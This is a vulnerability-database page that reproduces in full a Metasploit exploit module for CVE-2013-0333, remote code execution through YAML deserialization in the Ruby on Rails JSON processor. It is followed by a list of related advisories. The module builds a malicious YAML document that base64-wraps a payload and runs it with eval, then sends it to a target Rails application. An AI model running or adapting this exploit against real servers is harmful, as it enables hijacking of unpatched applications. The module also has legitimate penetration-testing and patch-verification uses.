Lucene search
RootSSV:60615HistoryFeb 03, 2013 - 12:00 a.m.
Ruby on Rails JSON Processor YAML Deserialization Code Execution
2013-02-0300:00:00
Root
www.seebug.org
42
0.973 High
EPSS
Percentile
99.9%
No description provided by source.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the
JSON request processor of the Ruby on Rails application framework.
This vulnerability allows an attacker to instantiate a remote object,
which in turn can be used to execute any ruby code remotely in the
context of the application. This vulnerability is very similar to
CVE-2013-0156.
This module has been tested successfully on RoR 3.0.9, 3.0.19, and
2.3.15.
The technique used by this module requires the target to be running a
fairly recent version of Ruby 1.9 (since 2011 or so). Applications
using Ruby 1.8 may still be exploitable using the init_with() method,
but this has not been demonstrated.
},
'Author' =>
[
'jjarmoc', # Initial module based on cve-2013-0156, testing help
'egypt', # Module
'lian', # Identified the RouteSet::NamedRouteCollection vector
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-0333'],
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DisclosureDate' => 'Jan 28 2013',
'DefaultOptions' => { "PrependFork" => true },
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])
], self.class)
end
#
# Create the YAML document that will be embedded into the JSON
#
def build_yaml_rails2
code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
"eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
yaml.gsub(':', '\u003a')
end
#
# Create the YAML document that will be embedded into the JSON
#
def build_yaml_rails3
code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:OpenStruct\n table:\n :defaults: {}\n"
yaml.gsub(':', '\u003a')
end
def build_request(v)
case v
when 2; build_yaml_rails2
when 3; build_yaml_rails3
end
end
#
# Send the actual request
#
def exploit
[2, 3].each do |ver|
print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/json',
'headers' => { 'X-HTTP-Method-Override' => 'get' },
'data' => build_request(ver)
}, 25)
handler
end
end
end
Related
packetstorm
packetstorm
Ruby On Rails XML Processor YAML Deserialization Code Execution
2013-01-11 00:00:00
Ruby on Rails JSON Processor YAML Deserialization Code Execution
2013-01-29 00:00:00
nessus
nessus
RHEL 6 : Ruby on Rails (RHSA-2013:0153)
2018-12-06 00:00:00
Debian DLA-172-1 : libextlib-ruby security update
2015-03-26 00:00:00
Debian DSA-2604-1 : rails - insufficient input validation
2013-01-10 00:00:00
metasploit
metasploit
Ruby on Rails XML Processor YAML Deserialization Scanner
2013-01-09 18:50:38
Ruby on Rails JSON Processor YAML Deserialization Scanner
2013-02-11 22:48:44
Ruby on Rails XML Processor YAML Deserialization Code Execution
2013-01-10 05:10:13
redhat
redhat
(RHSA-2013:0153) Critical: Ruby on Rails security update
2013-01-10 00:00:00
(RHSA-2013:0154) Critical: Ruby on Rails security update
2013-01-10 20:37:00
prion
prion
cve
cve
openvas
openvas
Debian: Security Advisory (DSA-2604-1)
2013-01-08 00:00:00
Ruby on Rails XML Processor YAML Deserialization RCE Vulnerability
2013-01-18 00:00:00
Debian Security Advisory DSA 2604-1 (rails - insufficient input validation)
2013-01-09 00:00:00
saint
saint
Ruby on Rails XML Processor YAML Deserialization
2013-02-15 00:00:00
Ruby on Rails XML Processor YAML Deserialization
2013-02-15 00:00:00
Ruby on Rails XML Processor YAML Deserialization
2013-02-15 00:00:00
veracode
veracode
osv
osv
actionpack Improper Input Validation vulnerability
2017-10-24 18:33:37
rails - insufficient input validation
2013-01-09 00:00:00
HTTParty does not restrict casts of string values
2017-10-24 18:33:37
debian
debian
[SECURITY] [DLA 172-1] libextlib-ruby security update
2015-03-14 19:01:22
[SECURITY] [DSA 2604-1] rails security update
2013-01-09 19:17:20
cert
cert
Ruby on Rails Action Pack framework insecurely typecasts YAML and Symbol XML parameters
2013-01-08 00:00:00
Ruby on Rails 3.0 and 2.3 JSON Parser vulnerability
2013-01-28 00:00:00
checkpoint_advisories
checkpoint_advisories
zdt
zdt
Action Pack Multiple Vulnerabilities
2013-01-09 00:00:00
Ruby On Rails XML Processor YAML Deserialization Code Execution
2013-01-11 00:00:00
kitploit
kitploit
threatpost
threatpost
Ruby on Rails Exploit Harvests IRC Botnet
2013-05-28 18:56:05
Exploit Code, Metasploit Module Out for Ruby on Rails Flaws
2013-01-10 15:01:40
Some Versions of Ruby on Rails Vulnerable to New Parsing Attack
2013-01-29 17:47:51
github
github
actionpack Improper Input Validation vulnerability
2017-10-24 18:33:37
nori contains Improper Input Validation
2017-10-24 18:33:37
activesupport in Rails vulnerable to incorrect data conversion
2017-10-24 18:33:37
thn
thn
Ruby on Rails exploit could hijack unpatched servers for botnet
2013-05-30 16:53:00
Ruby on Rails exploit could hijack unpatched servers for botnet
2013-05-31 03:53:00
gitlab
gitlab
Multiple vulnerabilities in parameter parsing in Action Pack
2013-01-13 00:00:00
seebug
seebug
Ruby on Rails XML Processor YAML Deserialization Code Execution
2014-07-01 00:00:00
ubuntucve
ubuntucve
debiancve
debiancve
exploitdb
exploitdb
rubygems
rubygems
Ruby Gem nori Parameter Parsing Remote Code Execution
2013-01-09 20:00:00
CVE-2013-0156 rubygem-activesupport: Multiple vulnerabilities in parameter parsing in ActionPack
2013-01-07 20:00:00
CVE-2013-1800 rubygem-crack: YAML parameter parsing vulnerability
2013-01-08 20:00:00
ics
ics
fedora
fedora
[SECURITY] Fedora 18 Update: rubygem-activesupport-3.2.8-2.fc18
2013-01-20 03:40:48
[SECURITY] Fedora 18 Update: rubygem-activesupport-3.2.8-3.fc18
2013-03-30 21:27:44
[SECURITY] Fedora 16 Update: rubygem-activemodel-3.0.10-2.fc16
2013-01-23 01:34:00
freebsd
freebsd
rubygem-rails -- multiple vulnerabilities
2013-01-08 00:00:00
puppet27 and puppet -- multiple vulnerabilities
2013-03-13 00:00:00
nmap
nmap
http-vuln-cve2013-0156 NSE Script
2013-04-25 03:15:33
suse
suse
ruby on rails to 2.3.16 (important)
2013-02-12 10:10:39
ruby on rails to 2.3.16 (important)
2013-02-12 11:04:29
Security update for Ruby on Rails (important)
2013-04-03 20:06:19
ibm
ibm
securityvulns
securityvulns
Apple Mac OS X multiple security vulnerabilities
2013-03-24 00:00:00
gentoo
gentoo
Ruby on Rails: Multiple vulnerabilities
2014-12-14 00:00:00